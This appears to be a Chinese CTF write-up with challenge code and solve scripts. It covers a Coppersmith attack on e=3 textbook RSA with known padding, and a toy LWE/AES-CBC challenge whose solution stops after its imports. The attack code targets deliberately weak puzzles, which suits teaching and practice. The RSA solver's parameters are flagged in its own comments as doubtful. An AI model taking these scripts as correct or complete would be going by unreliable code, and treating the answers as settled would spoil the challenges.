第三届黄河流域网络安全技能挑战赛

sandwitch

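三明治攻击:flag 被已知的前缀 pad1 和后缀 pad2 夹在中间,并且 e = 3。未知部分只有 39 字节(312 位),小于 n 位数的三分之一,所以可以用 Coppersmith 小根方法(Sage 的 small_roots)求解。把题目和名字都给 DeepSeek,并在 LLM 指导下对 small_roots 的参数进行爆破,得到 flag。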

from Crypto.Util.number import *
import gmpy2
# Placeholder flag. The real flag is 39 bytes long, so the assert below
# fails on this published stand-in value.
flag = b'flag{fake_flag}'
assert len(flag) == 39

# RSA modulus built from two fresh 512-bit primes, with public exponent 3.
p = getPrime(512)
q = getPrime(512)
n = p * q
e = 0x3

# Fixed, public padding on both sides of the flag: 12 + 39 + 15 = 66 bytes.
pad1 = b'easy_problem'
pad2 = b'How_to_solve_it'

# Textbook RSA: the message is deterministic and carries no randomized
# padding. With e = 3 and only the middle 39 bytes (312 bits) unknown, the
# unknown part is smaller than n**(1/3) (about 341 bits), which is the
# weakness this challenge is built on. Randomized padding such as RSA-OAEP
# is the standard defence against it.
plaintext = pad1 + flag + pad2
c = pow(bytes_to_long(plaintext), e, n)

for label, value in (("n", n), ("c", c)):
    print(f'{label} = {value}')

'''
n = 130210658110511504736422597261591182174531847806532340762131145212035478695205314931974421838392310731226415266775095601890938846830080329061111533796518633011922277343217149648494987341818402753017296362015915834670450122261511337212801488239810623226740266516836721952886027130703886460578247562781194524199
c = 58274335440051115211211273605191310114692293785750437685473044454042062899661976407492451518086227780147882738264722645944582899451063113444881286175099872016956825274378613983870549046907444680021237171113596116147511706486372974792692071549068969896395366667516390709069131700584308236332248449116109156503
'''

from sage.all import *
from Crypto.Util.number import bytes_to_long, long_to_bytes

# Public values printed by the challenge script.
n = 130210658110511504736422597261591182174531847806532340762131145212035478695205314931974421838392310731226415266775095601890938846830080329061111533796518633011922277343217149648494987341818402753017296362015915834670450122261511337212801488239810623226740266516836721952886027130703886460578247562781194524199
c = 58274335440051115211211273605191310114692293785750437685473044454042062899661976407492451518086227780147882738264722645944582899451063113444881286175099872016956825274378613983870549046907444680021237171113596116147511706486372974792692071549068969896395366667516390709069131700584308236332248449116109156503

# Known padding; the plaintext is pad1 || flag || pad2.
pad1 = b'easy_problem'  # 12 bytes
pad2 = b'How_to_solve_it'  # 15 bytes

A = bytes_to_long(pad1)
B = bytes_to_long(pad2)

# ------------------ key sanity checks -------------------
# 1. Confirm the padding lengths.
assert len(pad1) == 12 and len(pad2) == 15, "填充长度错误"

# 2. Bit offsets inside the 66-byte plaintext: the flag sits above pad2
#    (15 bytes), and pad1 sits above the flag (39 bytes) plus pad2.
flag_len = 39
shift_flag = 8 * len(pad2)  # 15 * 8 = 120 bits
total_shift_pad1 = 8 * (flag_len + len(pad2))  # (39 + 15) * 8 = 432 bits
assert total_shift_pad1 == 432 and shift_flag == 120, "位移计算错误"

# 3. Build the polynomial. x stands for the unknown flag as an integer, so
#    M is the whole plaintext and f(x) = M^3 - c is zero modulo n at the flag.
#    The plaintext is 66 bytes, so its cube is far larger than n and a plain
#    integer cube root of c does not recover it.
P.<x> = PolynomialRing(Zmod(n))
M = A * (2 ** total_shift_pad1) + x * (2 ** shift_flag) + B
f = (M**3 - c).monic()

# 4. Parameter sweep for small_roots. The unknown is below 2^312, under the
#    roughly n^(1/3) (about 341-bit) bound for a degree-3 root modulo n.
# NOTE(review): the root here is modulo n itself, which is the case Sage's
# default beta=1.0 covers; beta < 1 is meant for roots modulo an unknown
# divisor of n. Also confirm that small_roots accepts an `m` keyword in the
# Sage version used; extra keywords appear to be forwarded to LLL. TODO confirm.
success = False
candidates = (
    (m, beta, epsilon)
    for m in [3, 4, 5, 6]  # lattice dimension parameter
    for beta in [0.4, 0.45, 0.5]  # beta values
    for epsilon in [0.01, 0.02, 0.05]  # epsilon values
)
for m, beta, epsilon in candidates:
    print(f"\n尝试参数: m={m}, beta={beta}, epsilon={epsilon}")
    roots = f.small_roots(X=2**(39*8), beta=beta, epsilon=epsilon, m=m)
    if not roots:
        print(f"[-] 当前参数组合未找到根")
        continue
    # The first root found is taken as the flag; stop the whole sweep.
    flag = long_to_bytes(int(roots[0]))
    print(f"[+] 成功恢复Flag: {flag}")
    success = True
    break

if not success:
    print("\n[!] 所有参数组合均失败,请检查:")
    print(" 1. 填充结构是否与题目完全一致")
    print(" 2. 确认n和c的值正确")
    print(" 3. 尝试更高性能设备运行(增大m需要更多内存)")


Lattice

from Crypto.Util.number import *
from Crypto.Cipher import AES
import os
from secret import flag
import numpy as np


def gen(q, n, N, sigma):
    """Generate a public matrix and secret vector for the toy scheme.

    Args:
        q: Modulus.
        n: Number of secret entries.
        N: Number of rows (samples) in the public matrix.
        sigma: Noise scale; the Gaussian noise is multiplied by sigma**2.

    Returns:
        (P, s): P is the N x (n + 1) matrix [b | -A] with
        b = (A @ t + e) % q, and s is the vector (1, t). By construction
        P @ s is congruent to the noise e modulo q.
    """
    half = q // 2
    # Draw order (t, then A, then the noise) is kept so that a seeded
    # numpy generator produces the same output as before.
    t = np.random.randint(0, high=half, size=n)
    s = np.concatenate([np.ones(1, dtype=np.int32), t])
    A = np.random.randint(0, high=half, size=(N, n))
    noise = np.random.randn(N) * sigma**2
    e = np.round(noise).astype(np.int32) % q
    b = (A @ t + e) % q
    # b becomes the first column and the negated samples fill the rest.
    P = np.column_stack([b, -A])
    return P, s


def enc(P, M, q):
    """Encrypt a sequence of message values, one ciphertext row per value.

    Row i is (P.T @ r_i + floor(q / 2) * M[i] * (1, 0, ..., 0)) % q, where
    r_i is a fresh random 0/1 vector selecting rows of P.

    Args:
        P: Public matrix with shape (N, columns).
        M: Sequence of message values (the caller in this file passes bits).
        q: Modulus.

    Returns:
        An int32 array of shape (len(M), columns).
    """
    rows, cols = P.shape
    count = len(M)
    # One random 0/1 selection vector per message value.
    r = np.random.randint(0, 2, (count, rows))
    # The message only touches the first column, scaled by floor(q / 2).
    unit = np.zeros(cols, dtype=np.int32)
    unit[0] = 1
    half_row = np.floor(q / 2) * unit
    offset = half_row * np.asarray(M).reshape(-1, 1)
    C = (r @ P + offset) % q
    return C.astype(np.int32)


# Toy parameters. gen() draws each of the n = 3 secret entries from
# [0, q // 2), so there are only 63**3 = 250047 possible secrets; this is far
# too small to offer any security and is only suitable for an exercise.
q, n, sigma = 127, 3, 1.0
# Number of samples; evaluates to 15, matching the 15 rows of the printed P.
N = int(1.1 * n * np.log(q))

P, s = gen(q=q, n=n, N=N, sigma=sigma)


def prep(s):
    """Convert a string to an int32 array of bits, most significant bit first.

    Each character contributes the binary digits of its code point,
    zero-padded to at least 8 digits.
    """
    bits = []
    for char in s:
        bits.extend(int(b) for b in format(ord(char), "08b"))
    return np.array(bits, dtype=np.int32)


# Encrypt the hint bit by bit and publish the public matrix and ciphertext.
# NOTE(review): `hint` is not defined in this listing; presumably it comes
# from the redacted `secret` module. Confirm against the original challenge.
bits = prep(hint)
C = enc(P, bits, q).tolist()
P = P.tolist()
# The f-string `=` form prints the variable name too, e.g. "P=[[...]]".
print(f"{P=}")
print(f"{C=}")

'''
P=[[87, -27, -52, -29], [57, -41, -24, -60], [76, -17, -55, -37], [75, -46, -33, -21], [121, -55, -33, -34], [47, -4, -34, -45], [112, -33, -44, -16], [74, -44, -5, -25], [20, -21, -16, -49], [89, -21, -54, -24], [18, -23, -53, -1], [35, -40, -4, -29], [105, -54, -2, -8], [44, -24, -43, -36], [111, -15, -15, -54]]
C=[[24, 75, 81, 85], [24, 14, 85, 102], [115, 1, 5, 21], [58, 118, 104, 77], [65, 42, 101, 103], [33, 38, 50, 67], [7, 81, 38, 58], [117, 101, 54, 11], [44, 29, 81, 8], [59, 114, 70, 121], [62, 13, 9, 105], [11, 43, 97, 23], [39, 82, 75, 97], [122, 113, 14, 30], [70, 102, 116, 5], [58, 44, 61, 20], [73, 119, 59, 28], [119, 68, 57, 122], [61, 91, 83, 44], [103, 29, 1, 73], [47, 60, 120, 125], [17, 126, 14, 21], [104, 8, 78, 123], [72, 121, 54, 74], [48, 104, 49, 66], [72, 56, 27, 69], [34, 110, 41, 54], [33, 54, 74, 44], [70, 65, 11, 113], [122, 3, 69, 35], [58, 7, 39, 64], [59, 106, 49, 66], [77, 92, 87, 92], [95, 21, 96, 83], [67, 55, 30, 73], [99, 54, 18, 90], [101, 102, 126, 107], [81, 46, 104, 83], [38, 24, 94, 60], [114, 105, 76, 97], [22, 115, 20, 67], [40, 72, 110, 65], [111, 92, 106, 117], [5, 123, 21, 96], [41, 14, 23, 114], [113, 75, 43, 65], [56, 3, 61, 48], [40, 101, 16, 114], [42, 84, 95, 13], [36, 110, 91, 107], [4, 13, 60, 74], [24, 80, 125, 76], [123, 26, 27, 119], [31, 87, 6, 123], [61, 106, 73, 120], [66, 10, 36, 65], [91, 38, 46, 9], [121, 20, 106, 48], [123, 21, 78, 27], [22, 74, 55, 110], [47, 49, 118, 76], [30, 10, 16, 118], [43, 19, 52, 61], [100, 9, 37, 35], [20, 102, 111, 94], [116, 63, 55, 43], [13, 110, 42, 14], [46, 65, 71, 28], [82, 5, 76, 74], [86, 34, 117, 84], [28, 44, 82, 50], [76, 79, 77, 11], [68, 39, 51, 89], [83, 93, 95, 2], [54, 108, 101, 82], [99, 90, 122, 37], [16, 92, 79, 12], [67, 86, 24, 36], [80, 94, 106, 59], [50, 56, 95, 98], [33, 68, 89, 40], [74, 124, 14, 82], [88, 93, 54, 93], [51, 17, 124, 31], [17, 17, 45, 35], [113, 71, 76, 44], [48, 6, 120, 4], [36, 91, 108, 11], [2, 41, 58, 72], [42, 59, 51, 81], [73, 22, 79, 27], [85, 35, 29, 98], [76, 76, 37, 22], [82, 29, 42, 27], [75, 114, 37, 106], [40, 69, 53, 73], [39, 44, 33, 121], [94, 85, 92, 54], [91, 77, 124, 46], [108, 31, 101, 84], [35, 33, 97, 45], [99, 32, 17, 14], [1, 66, 11, 35], [78, 100, 95, 81], [73, 49, 14, 37], [70, 9, 107, 2], [84, 98, 92, 62], [123, 87, 
87, 110], [3, 81, 111, 28], [20, 2, 91, 37], [93, 101, 77, 93], [27, 16, 31, 105], [95, 81, 87, 17], [10, 103, 21, 102], [81, 57, 118, 82], [15, 92, 60, 71], [16, 84, 126, 49], [35, 26, 2, 120], [70, 86, 45, 9], [29, 8, 40, 66], [99, 77, 14, 9], [12, 70, 50, 52], [21, 21, 85, 54], [91, 94, 100, 85], [9, 42, 47, 14], [117, 55, 17, 99], [53, 45, 4, 72], [49, 10, 27, 121], [108, 61, 73, 42], [121, 42, 41, 71], [49, 63, 50, 117], [5, 78, 24, 101], [0, 117, 21, 46], [90, 43, 47, 32], [74, 85, 118, 84], [13, 73, 18, 66], [95, 24, 120, 18], [94, 21, 111, 34], [66, 68, 80, 21], [102, 49, 57, 55], [25, 85, 107, 98], [8, 18, 88, 12], [18, 6, 86, 82], [18, 91, 126, 115], [26, 11, 30, 35], [88, 78, 76, 74], [51, 75, 76, 15], [60, 24, 72, 27], [91, 72, 44, 104], [84, 113, 39, 116], [41, 83, 91, 74], [84, 17, 94, 119], [46, 95, 85, 5], [109, 58, 71, 42], [126, 29, 114, 73], [27, 70, 7, 125], [121, 66, 97, 111], [8, 21, 10, 57], [15, 62, 65, 8], [101, 79, 32, 74], [69, 42, 38, 58], [65, 81, 72, 16], [20, 81, 1, 126], [91, 111, 69, 33], [56, 84, 65, 66], [47, 78, 43, 100], [43, 90, 80, 25], [46, 55, 10, 60], [116, 110, 49, 116], [72, 115, 38, 104], [79, 43, 74, 106], [86, 113, 84, 76], [102, 2, 119, 3], [126, 25, 83, 44], [37, 83, 46, 40], [13, 75, 101, 101], [76, 93, 3, 63], [69, 9, 84, 37], [103, 47, 106, 80], [72, 104, 85, 19], [124, 118, 34, 81], [57, 25, 52, 119], [44, 56, 63, 90], [123, 46, 124, 31], [19, 116, 23, 77], [126, 78, 37, 93], [34, 95, 43, 98], [37, 90, 32, 97], [106, 8, 80, 8], [90, 5, 113, 68], [99, 40, 39, 18], [90, 37, 48, 45], [56, 13, 76, 6], [68, 33, 52, 102], [62, 45, 29, 123], [100, 21, 73, 92], [92, 18, 118, 23], [84, 86, 42, 83], [107, 8, 71, 52], [114, 106, 78, 85], [10, 120, 115, 119], [27, 49, 124, 16], [65, 40, 48, 37], [69, 42, 8, 29], [35, 39, 55, 102], [58, 19, 41, 75], [17, 2, 113, 12], [8, 34, 72, 75], [91, 32, 19, 52], [62, 50, 109, 78], [9, 115, 35, 50], [42, 83, 78, 41], [34, 94, 97, 58], [56, 73, 25, 115], [55, 12, 16, 86], [97, 95, 30, 
92], [47, 105, 70, 68], [50, 18, 51, 23], [46, 57, 80, 29], [4, 66, 123, 24], [55, 53, 26, 36], [71, 59, 104, 91], [94, 3, 1, 34], [57, 8, 85, 102], [89, 73, 115, 25], [13, 38, 81, 76], [104, 30, 81, 104], [55, 101, 95, 101], [69, 65, 5, 11], [123, 105, 84, 125], [38, 110, 4, 28], [112, 115, 92, 71], [90, 120, 112, 39], [50, 18, 107, 71], [95, 63, 118, 93], [93, 111, 59, 55], [17, 15, 2, 88], [78, 126, 37, 12], [56, 112, 53, 12], [65, 34, 82, 100], [9, 94, 72, 99], [78, 76, 43, 91], [7, 88, 107, 31], [43, 91, 97, 4], [113, 112, 36, 15], [8, 97, 23, 84], [65, 92, 31, 63], [54, 38, 119, 103], [89, 50, 57, 50], [61, 37, 87, 0], [21, 35, 44, 22], [20, 32, 95, 116], [10, 94, 103, 84], [59, 29, 7, 50], [98, 33, 87, 33], [7, 96, 36, 67], [85, 10, 35, 98], [65, 49, 19, 62], [56, 67, 14, 91], [30, 49, 111, 77], [121, 49, 108, 119], [89, 67, 115, 69], [65, 8, 0, 82], [117, 57, 117, 23], [23, 38, 2, 98], [60, 28, 94, 93], [23, 65, 8, 114], [121, 105, 122, 40], [120, 12, 21, 112], [55, 51, 2, 77], [48, 41, 113, 62], [66, 82, 117, 119], [4, 15, 5, 21], [41, 14, 12, 80], [23, 61, 106, 16], [23, 53, 122, 68], [6, 54, 5, 101], [69, 49, 7, 79], [17, 70, 64, 88], [103, 30, 76, 31], [108, 82, 90, 109], [55, 56, 113, 37], [93, 99, 126, 44], [1, 46, 105, 124], [55, 54, 35, 115], [0, 89, 53, 97], [67, 111, 107, 80], [92, 122, 40, 64], [75, 2, 126, 118], [90, 84, 43, 74], [101, 69, 60, 17], [104, 10, 4, 122], [94, 4, 115, 91], [15, 11, 111, 105], [9, 7, 32, 101], [77, 18, 55, 56], [66, 7, 117, 108], [116, 121, 33, 66], [32, 41, 83, 125], [60, 52, 70, 58], [125, 54, 93, 15], [70, 19, 10, 58], [83, 94, 61, 126], [95, 85, 80, 44], [25, 89, 117, 74], [12, 17, 63, 87], [118, 80, 96, 26], [6, 97, 79, 38], [97, 3, 107, 95], [7, 82, 106, 92], [83, 100, 119, 95], [81, 26, 99, 56], [25, 60, 51, 122], [56, 18, 22, 84], [9, 72, 107, 114], [80, 97, 92, 52], [108, 47, 58, 46], [9, 47, 7, 47], [115, 68, 91, 7], [14, 120, 87, 122], [97, 15, 40, 79], [5, 92, 85, 93], [4, 97, 73, 63], [25, 22, 92, 108], 
[88, 4, 34, 86], [0, 43, 21, 57], [67, 90, 36, 50], [15, 126, 37, 12], [92, 73, 96, 71], [76, 107, 27, 115], [79, 8, 68, 55], [38, 12, 120, 126], [54, 46, 7, 69], [72, 114, 93, 60], [59, 98, 27, 102], [50, 76, 87, 19], [77, 107, 29, 40], [36, 73, 21, 123], [36, 89, 82, 74], [24, 73, 118, 86], [58, 89, 115, 106], [12, 27, 33, 72], [28, 94, 21, 26], [0, 79, 48, 110], [72, 62, 82, 57], [65, 84, 114, 97], [80, 68, 52, 52], [119, 35, 103, 101], [10, 67, 68, 69], [101, 17, 54, 40], [98, 46, 21, 42], [30, 39, 56, 118], [27, 33, 77, 114], [66, 74, 61, 63], [23, 13, 14, 47], [88, 30, 122, 119], [15, 58, 55, 52], [56, 27, 47, 45], [119, 95, 59, 14], [84, 69, 5, 83], [21, 35, 39, 36], [10, 92, 68, 17], [79, 67, 111, 38], [36, 1, 4, 117], [117, 30, 5, 7], [112, 15, 115, 123], [54, 47, 18, 93], [102, 111, 3, 68], [91, 91, 5, 44], [123, 118, 57, 32], [12, 121, 31, 103], [114, 52, 105, 12], [100, 28, 117, 102], [51, 42, 12, 124], [47, 1, 42, 47], [28, 3, 22, 100], [103, 105, 119, 24], [101, 59, 13, 78], [79, 36, 61, 54], [11, 46, 75, 116], [31, 73, 118, 0], [92, 32, 0, 124], [77, 85, 25, 90], [29, 21, 74, 7], [3, 66, 11, 8], [112, 91, 50, 53], [45, 113, 99, 123], [35, 65, 85, 22], [108, 99, 42, 1], [103, 113, 116, 72], [125, 74, 112, 24], [75, 79, 80, 12], [83, 44, 94, 86], [64, 20, 0, 8], [104, 126, 31, 120], [85, 75, 61, 74], [36, 93, 36, 102], [70, 54, 101, 83], [90, 46, 109, 83], [112, 126, 114, 23], [16, 123, 97, 62], [118, 86, 108, 53], [99, 18, 2, 18], [103, 3, 38, 8], [99, 49, 123, 81], [37, 75, 89, 53], [34, 77, 27, 122], [29, 8, 40, 66], [119, 13, 64, 83], [4, 108, 116, 121], [49, 87, 1, 92], [15, 63, 80, 62], [27, 81, 100, 83], [7, 90, 16, 0], [13, 50, 61, 65], [51, 64, 76, 5], [55, 100, 106, 66], [52, 102, 105, 2], [49, 34, 89, 116], [24, 55, 11, 27], [91, 48, 73, 38], [27, 5, 1, 126], [66, 55, 80, 19], [52, 118, 104, 43], [36, 1, 111, 60], [65, 4, 34, 17], [54, 22, 0, 39], [52, 30, 64, 62], [26, 40, 32, 86], [93, 71, 41, 47], [77, 23, 15, 9], [11, 20, 51, 31], [64, 
50, 37, 50], [17, 49, 80, 37], [119, 115, 115, 50], [20, 86, 27, 5], [101, 65, 17, 78], [56, 25, 125, 56], [16, 118, 2, 96], [114, 108, 69, 121], [14, 37, 76, 101], [113, 124, 121, 82], [43, 120, 35, 94], [82, 67, 23, 43], [9, 79, 47, 122], [39, 28, 110, 31], [35, 48, 27, 16], [72, 8, 115, 66], [54, 46, 122, 19], [77, 77, 30, 74], [58, 63, 81, 96], [6, 122, 75, 63], [115, 31, 119, 110], [82, 86, 89, 1], [79, 100, 6, 110], [117, 67, 15, 13], [4, 15, 63, 0], [106, 108, 122, 107], [34, 72, 0, 114], [20, 0, 32, 56], [121, 104, 66, 3], [86, 28, 76, 84], [85, 9, 60, 45], [95, 80, 78, 65], [39, 85, 50, 49], [42, 103, 36, 90], [70, 99, 116, 117], [34, 15, 40, 52], [24, 49, 19, 31], [98, 90, 95, 89], [63, 45, 40, 77], [114, 14, 30, 106], [10, 35, 116, 9], [103, 111, 112, 16], [71, 112, 71, 32], [77, 31, 105, 64], [84, 87, 24, 67], [1, 27, 123, 57], [104, 29, 87, 123], [110, 39, 67, 7], [28, 70, 108, 113], [96, 9, 101, 36], [13, 28, 6, 13], [69, 81, 89, 26], [79, 113, 77, 91], [112, 62, 104, 117], [109, 95, 55, 83], [78, 68, 98, 14], [73, 79, 96, 12], [108, 39, 97, 49], [27, 111, 106, 100], [82, 70, 9, 36], [48, 31, 90, 70], [99, 92, 45, 35], [55, 100, 31, 37], [75, 17, 69, 35], [12, 38, 119, 112], [103, 34, 63, 76], [26, 19, 91, 111], [74, 122, 12, 78], [64, 117, 16, 60], [2, 97, 122, 106], [62, 79, 56, 30], [71, 47, 13, 22], [38, 78, 116, 16], [87, 28, 94, 76], [77, 126, 94, 116], [83, 46, 104, 90], [5, 95, 13, 26], [47, 10, 46, 115], [82, 19, 91, 70], [111, 72, 49, 65], [18, 103, 59, 72], [17, 37, 56, 24], [19, 120, 24, 64], [28, 40, 11, 20], [18, 19, 80, 62], [37, 11, 74, 14], [109, 97, 75, 72], [116, 65, 52, 121], [95, 63, 82, 122], [88, 93, 54, 93], [77, 30, 65, 121], [99, 121, 42, 87], [62, 52, 44, 6], [79, 60, 55, 4], [96, 64, 6, 20], [94, 114, 90, 8], [123, 98, 29, 27], [116, 84, 31, 80], [9, 77, 45, 45], [120, 33, 63, 15], [51, 44, 66, 25], [2, 46, 72, 94], [107, 113, 50, 46], [115, 64, 126, 85], [64, 10, 28, 78], [84, 112, 64, 103], [59, 114, 15, 82], [65, 122, 
104, 89], [113, 122, 21, 11], [69, 106, 19, 78], [42, 93, 125, 0], [7, 123, 82, 70], [103, 114, 62, 92], [15, 30, 78, 114], [4, 78, 111, 60], [40, 80, 34, 55], [3, 87, 120, 27], [122, 64, 3, 122], [24, 49, 31, 81], [26, 43, 100, 19], [52, 78, 2, 97], [116, 45, 15, 33], [21, 119, 92, 86], [28, 118, 71, 24], [106, 15, 0, 79], [36, 4, 52, 73], [22, 43, 8, 60], [96, 22, 9, 100], [19, 64, 26, 96], [97, 61, 22, 39], [6, 112, 76, 38], [58, 6, 97, 94], [103, 87, 87, 101], [17, 49, 80, 37], [117, 33, 26, 8], [59, 108, 78, 91], [113, 28, 30, 44], [119, 78, 72, 20], [49, 101, 77, 2], [26, 18, 35, 7], [34, 38, 99, 37], [45, 52, 90, 27], [108, 31, 118, 67], [3, 37, 29, 88], [111, 96, 12, 111], [91, 111, 106, 100], [52, 78, 117, 80], [14, 51, 87, 0], [1, 52, 116, 1], [117, 2, 33, 48], [57, 0, 48, 34], [59, 14, 84, 63], [82, 83, 8, 82], [58, 100, 32, 33], [75, 29, 112, 103], [0, 49, 45, 54], [94, 9, 51, 110], [54, 61, 27, 47], [88, 89, 23, 37], [73, 43, 0, 32], [123, 6, 35, 78], [73, 72, 119, 64], [81, 46, 11, 102], [42, 124, 47, 8], [50, 66, 3, 40], [116, 7, 51, 20], [47, 112, 99, 7], [42, 37, 86, 89], [18, 74, 78, 101], [57, 85, 75, 7], [26, 90, 35, 10], [72, 126, 10, 77], [55, 12, 5, 78], [37, 87, 85, 96], [91, 9, 114, 68], [79, 76, 44, 20], [84, 52, 63, 56], [95, 9, 22, 117], [96, 38, 50, 67], [43, 114, 45, 56], [94, 21, 74, 107], [92, 82, 81, 71], [40, 10, 10, 90], [20, 18, 15, 56], [72, 2, 30, 22], [50, 31, 123, 20], [85, 40, 115, 115], [93, 1, 48, 47], [111, 118, 45, 34], [9, 122, 37, 121], [60, 27, 77, 41], [122, 38, 22, 39], [115, 66, 74, 126], [77, 67, 90, 78], [96, 3, 53, 52], [5, 26, 120, 101], [45, 100, 72, 6], [106, 56, 87, 77], [52, 68, 102, 95], [1, 13, 36, 33], [58, 27, 35, 8], [52, 5, 38, 35], [102, 82, 63, 47], [24, 71, 119, 43], [11, 36, 90, 13], [11, 93, 27, 23], [4, 107, 26, 125], [85, 9, 5, 13], [116, 25, 55, 119], [73, 82, 73, 2], [40, 123, 77, 41], [10, 98, 51, 111], [23, 79, 120, 54], [56, 18, 22, 84], [61, 115, 51, 109], [33, 5, 12, 121], [8, 81, 35, 
70], [22, 39, 103, 2], [38, 74, 66, 126], [83, 20, 117, 85], [8, 32, 91, 98], [37, 31, 94, 119], [7, 30, 45, 43], [68, 16, 124, 97], [86, 124, 37, 21], [29, 101, 15, 30], [27, 31, 52, 45], [47, 37, 102, 3], [117, 49, 54, 89], [48, 94, 126, 66], [42, 115, 63, 104], [14, 74, 6, 112], [68, 125, 4, 5], [66, 3, 78, 52], [108, 33, 6, 77], [77, 99, 16, 52], [61, 78, 73, 70], [108, 106, 124, 0], [23, 35, 119, 118], [125, 124, 37, 65], [69, 30, 61, 110], [77, 10, 120, 118], [53, 121, 24, 30], [87, 32, 29, 63], [54, 64, 1, 3], [16, 59, 104, 25], [30, 6, 59, 102], [43, 120, 35, 94], [89, 13, 69, 39], [87, 78, 100, 14], [83, 17, 14, 4], [24, 49, 31, 81], [73, 32, 72, 10], [0, 22, 61, 54], [81, 42, 70, 13], [108, 56, 52, 2], [25, 99, 116, 72], [66, 23, 18, 102], [121, 115, 47, 12], [96, 37, 123, 48], [64, 69, 4, 39], [78, 38, 124, 31], [27, 69, 10, 70], [5, 29, 2, 85], [30, 45, 56, 7], [31, 25, 120, 61], [36, 89, 89, 118], [98, 63, 18, 21], [121, 83, 36, 57], [60, 5, 86, 17], [121, 55, 117, 58], [12, 96, 4, 27], [119, 63, 124, 37], [96, 27, 45, 91], [42, 119, 8, 103], [104, 42, 68, 37], [104, 55, 41, 38], [120, 3, 50, 87], [120, 121, 20, 67], [58, 123, 50, 28], [103, 62, 58, 20], [97, 27, 89, 102], [7, 51, 56, 108], [73, 60, 10, 77], [56, 72, 103, 69], [101, 89, 18, 66], [115, 35, 80, 36], [98, 103, 39, 63], [29, 126, 67, 76], [27, 97, 15, 79], [36, 6, 17, 90], [126, 54, 101, 42], [115, 66, 74, 126], [78, 80, 62, 83], [60, 11, 31, 88], [16, 73, 108, 13]]
'''

# Fresh random 128-bit AES key.
# NOTE(review): `iv`, `pad` and `leak` are not defined in this listing; `pad`
# is presumably Crypto.Util.Padding.pad and the other two were redacted from
# the published challenge. Confirm against the original source.
key = os.urandom(16)
cipher = AES.new(key=key, iv=iv, mode=AES.MODE_CBC)
# Every element of `flag` (every character, if flag is a str) is padded to a
# full 16-byte block on its own before the blocks are joined.
blocks = [pad(i.encode(), 16) for i in flag]
encrypted = cipher.encrypt(b"".join(blocks))

# The key is printed next to the ciphertext, so the IV is the only secret
# left. In CBC the IV only masks the first block; a real system must keep the
# key secret and must not rely on IV secrecy.
print(leak)
print(key)
print(encrypted)

'''
-3.257518803980229925210589904230583482986646342139415561576950148286382674434770529248486501793457710730252401258721482142654716015216299244487794967600132597049154513815052213387666360825101667524635777006510550117512116441539852315185793280311905620746025669520152068447372368293640072502196959919309286241
b'\x8fj\x94\x98-\x1fd\xd5\x89\xbe\xa9*Tu\x90\xb7'
b'\x9fT@\xbc\x82\x8esQ\x1e\xd8\x1d\xdb\x9b\xb4\xf8rU\xc8\xa0\xcb\xaf H\xa9.\x04\x1e\xd2\x92\x1f\x0fBja-\x965x\xa8@\xc9x\xf9\xaf\x87\xd1\xa5}\xfc\x1b\xe0#\xc3m\xc9\x8973\x1c\x1f\x13\x8f\xb2a\xae\xa9]\xb9\xc2\xe8\x83A\x80\x13g\xc9a\x1c<\x8a\x9c&\xd9\xbd\x06\xef\xba9\xb0\x03\x9f\x022\xc9\x13\x9a\xffXPG\xc6o\xc0\xeaV7)XG9L\x84N7U\xe3Wn0G\x8e\xd3\x04(\n\x08\xb9\x17\xe6\xf1\xaa\xb7\x8a@$\x16\x13\x06A\x00\xc9Z\xdf\x7fQ\xc9\x08\xb4\xf3P\xfcpe\xe2\xeb\x96\x0e(-\xde\x17\xd1\x01\x1c_\x82\x8b\x9fw\xc8\x86\xfbw\xb5\xf7\xd0\xc8\x1784\xe3?\x00\x0b.)\xb7\xbc\x8e{\xe0\xae\x8d$\x0f\x19\'\xb6\xee@d\x00\xd9\x84\x8c\x0e\xa3,\xc6a\xa3\xba*1\xfd<\xfd\x18\xd6\x9e\x8c4\x8e#\xfd\xbd&0R\xeddE,\xed\xb6\x1e\x00\x11\xa6K\xd3\x1dT\x8c5\x8e\x00\xea\x10\xe9\'u"B#\xa1#\xd8\xe3\xf5j\xbc\x94M\xda\xe3\xcb*\xf0W1\xa0\x80\x1d\xfc\xbfo\x01?(da\r\xb6\x86\xd0\x90\x88Z\xa1`B\x89\x89\x89\xb3v\xa5\xf0\xe0\x0c\x8e\xcc+P\xfc\xfd#\x83\xe9\x93\x96\n\xf2\xa5\xfb\xc3\xc5\xaa\x9e\x89\x93\xb6\xf5\xea\x8c%NY\xc3\x0eR\xfas\xa1\x13\xf2/*\xce\x8b_:_r\xeb\xbe\x0b\x8a\x8c\x97\x7f|m}\xae\xa9I\x95\xcc\xe7\x80\xa5yC4\x1f5\xa4P\xc5\xbf.\xf9V\xe8|\xbb\xc3\xcb\x98&\'JB\x99\x94\xc0\r$\x0b\xbe48u\xeb\xca\xa1\xfbb\xd8_R\x97\x8e\xaeI\xfc\xc2\xb2\xd2#@\xec\x16\xf1\xd7eCQ\x1cO\x13\xca\xb5\xd3\x1a\xb1\xf1_D\x80\x06\xa5\xbe\xbev\xbd\xd6\xbb\x9a\xc9x\x9cf:\xcb>\xa2\xe1\xcad\xde]aw\xa0\xdc\xb2\xb3{+\x85\x8d\x8b\xc5\rT\xcc\xd9X\xd5\x9b\r<\x99m\xb8b6s\xbfp\x0eo~\xe9&\xb2{\xbe\xee\x93\xd2N1\\\x94\x968IWO7\xcb\xb6e\x80\xf7\x9air\xb2~\x17\x1cF\x0f\x82T]RBX\xdex\x13\x85\xfa\xcd-\xce\xdc\xe4\xe5^\x99u\xb5\x01\xd0-\xc3C\xcd\xc4y6\xb7\x9d|L1\xe74\xf7\x8cH\xe9\xa9\xfav\n\xec;\xf2\xa2w\xfb\x13_b\r)z!\xa3\xc8\xa8\xc2\xd2\x10\x00\x11\x11\r\xb2&\xfb\x04&\x84">x6l[\x06n>\xa0\xbe\x9c`\xa7\x9e\xe0\xfb\x85\x91\xc4,\xcf\xac\xe11@a\xed3@\xfd}\x8e\xfaTp\xcb7\xe7\xbf\xd4\xe0~b\xd9\xe0<\xba\x81\xd4"e\xfc\x939|j#0H\x86\xf8\x0b\x03\xd2\xe8\xf5\xe55\xdc\xc8\x06\\\xb7)\xcc\x9b\'\xf12'
'''

让DeepSeek做

import numpy as np
from Crypto.Cipher import AES
from Crypto.Util.Padding import unpad

# Given data
